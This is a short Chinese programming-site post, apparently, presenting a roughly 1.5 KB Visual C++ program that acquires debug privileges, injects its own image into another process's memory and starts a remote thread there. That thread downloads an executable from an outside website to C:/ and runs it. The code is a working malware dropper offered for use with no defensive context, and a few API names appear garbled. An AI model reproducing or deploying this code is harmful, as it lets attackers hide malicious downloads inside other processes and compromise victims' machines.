TOP

VC++1.5K字节实现下载并远程注入
2014-11-23 19:26:28 】 浏览:9771
Tags:1.5K 字节 实现 下载 远程 注入

[cpp]
#pragma comment(linker,"/BASE:0x13140000 /ENTRY:InjectPro /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")
#pragma comment(lib, "urlmon.lib")
#include < windows.h>

void InjectMemo()

{
URLDownloadToFile(0, "http://www.fi7ke.com/upiea.exe", TEXT("C:/upiea.exe"), 0, 0);
WinExec("c:/upiea.exe", SW_SHOW);
ExitThread(0);
}

void GetDebugPrivs()
{
HANDLE hToken;
DWORD ReGvl;
TOKEN_PRIVILEGES Ttges;

if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
LookupPrivilegeva lue(NULL, "SeDebugPrivilege", &Ttges.Privileges[0].Luid);
Ttges.PrivilegeCount=1;
Ttges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &Ttges, 0,(PTOKEN_PRIVILEGES)NULL, &ReGvl);
}
}

void InjectPro()
{
DWORD Size,PID;
PBYTE module;
module = (PBYTE)GetModuleHandle(0);
Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
HANDLE ProcessHandle;
LPVOID heart;
GetDebugPrivs();
GetWindowThreadProcessId(FindWindow("#32770", NULL), &PID);
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE);
heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, heart, module, Size, NULL);
CreateRemoteThread(ProcessHandle, 0, 0, (LPTHREAD_START_ROUTINE)InjectMemo, module, 0, NULL);
}
作者:yincheng01

VC++1.5K字节实现下载并远程注入 https://www.cppentry.com/bencandy.php?fid=55&id=15520

】【打印繁体】【投稿】【收藏】 【推荐】【举报】【评论】 【关闭】 【返回顶部
上一篇VS源文件提取工具vsjuicer 实现细.. 下一篇递归删除目录及目录子目录